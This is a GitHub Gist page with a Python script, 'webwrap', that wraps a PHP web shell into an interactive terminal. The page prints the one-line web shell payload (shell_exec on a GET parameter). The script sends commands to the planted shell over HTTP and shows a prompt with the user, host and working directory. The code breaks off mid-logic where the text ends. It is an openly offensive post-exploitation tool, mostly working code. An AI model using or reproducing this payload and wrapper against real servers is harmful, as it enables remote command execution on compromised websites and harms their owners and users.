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Last active August 15, 2020 00:20
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  • Save hexabeast/fb6b5cf0cd4a51ca93fa300c9bb7a3e2 to your computer and use it in GitHub Desktop.
Save hexabeast/fb6b5cf0cd4a51ca93fa300c9bb7a3e2 to your computer and use it in GitHub Desktop.
Basic webshell commandline wrapper, gives a nice-looking shell (without revshell/bind shell) using any page containing this kind of payload somewhere in it : <?php echo shell_exec($_GET[e]); ?>
#USAGE : webwrap ''
import readline
from termcolor import colored
import urllib.parse
import sys
import requests
link = sys.argv[1]
commands = []
pat = "ZYZZ"
ech = "echo -n '"+pat+"';"
while True:
prefix = ""
if len(commands)>0:
prefix = ";".join(commands)+";"
who,host,pwd = requests.get(link+urllib.parse.quote(ech+prefix+"echo -n `whoami`#`hostname`#`pwd`"+' 2>&1;'+ech)).text.split(pat)[1].split("#")
desc = colored(who+"@"+host,"green")+":"+colored(pwd,"blue")+colored("$ ","white")
com = input(desc)
fcom = prefix+com
rep = requests.get(link+urllib.parse.quote(ech+fcom+' 2>&1;'+ech)).text.split(pat)[1]
if (com[:3] == "cd ") and not "cd" in rep:
if len(com)>2 and com[3]=="/":
commands = []
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